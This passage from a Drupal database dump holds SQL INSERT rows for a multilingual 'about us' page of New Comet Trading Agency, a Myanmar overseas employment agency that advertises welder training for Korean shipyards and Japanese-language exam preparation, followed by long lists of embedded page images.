src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 264, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.<o:p></o:p><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 265, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30.jpg\" data-align=\"center\" data-entity-uuid=\"891213d9-115b-4b86-8d26-3ebbbbeb98a8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-31.jpg\" data-align=\"center\" data-entity-uuid=\"95019304-f6cb-4eaa-90da-ef0d7f51ee47\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-32.jpg\" data-align=\"center\" data-entity-uuid=\"361d538d-8be6-49d8-ae4e-5ac9247fd5b9\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-33.jpg\" data-align=\"center\" data-entity-uuid=\"e46b1924-0cc4-41fc-baa4-df9dd73fbec8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-34.jpg\" data-align=\"center\" data-entity-uuid=\"809ca92e-91d6-401f-b00b-567cc35ce1c5\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35.jpg\" data-align=\"center\" data-entity-uuid=\"667d5781-8402-43e6-853f-ec90e796e6c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36.jpg\" data-align=\"center\" data-entity-uuid=\"58b87ffa-6876-47b0-9e6e-d43d2c7aff38\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37.jpg\" data-align=\"center\" data-entity-uuid=\"7b3b8c38-5bbf-4e74-85eb-618ca90b2db6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38.jpg\" data-align=\"center\" data-entity-uuid=\"d0e647b4-4413-4a58-b4cb-91c95524d97f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39.jpg\" data-align=\"center\" data-entity-uuid=\"ad197c72-ff23-4b15-b4ad-d15c791e6a77\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 23, 265, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_1.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2_0.jpg\"><img data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_0.jpg\"><img data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_0.jpg\" alt=\"\" data-align=\"center\"><p>&nbsp;</p><img data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_0.jpg\"><img data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-13_0.jpg\" alt=\"\"><img data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-14_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-15_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-16_0.jpg\"><img data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-17_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-18_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_0.jpg\" alt=\"\"><img data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-20_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"3aae8220-86a7-4232-91d1-58e14468ec77\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-30_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"031623ed-3c0b-4a1b-acd5-2d701d16ebac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-31_0.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ef87488d-b6fc-43b9-a474-536a45ca31b3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-32_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"b6b3f255-33bb-4aa9-bf27-91cff7be1296\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-33_0.jpg\"><img data-entity-uuid=\"19536b68-3af1-4ad0-9b3f-6a52f8d321d4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-34_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"99f5c203-f9a2-461a-8abc-2c8ba6a07f85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-35_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"a6cddcbb-87bf-46e9-b5f0-6eb2c81ee34a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-36_0.jpg\" alt=\"\"><img data-entity-uuid=\"6e3b7635-3292-469e-a404-d217c165d0c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-37_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"96bb0f24-5735-4d44-9780-209fc82eba38\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-38_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"b0020490-36a6-4ed1-bde8-eecc0d0e0bc0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-39_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\">', '', 'full_html'),
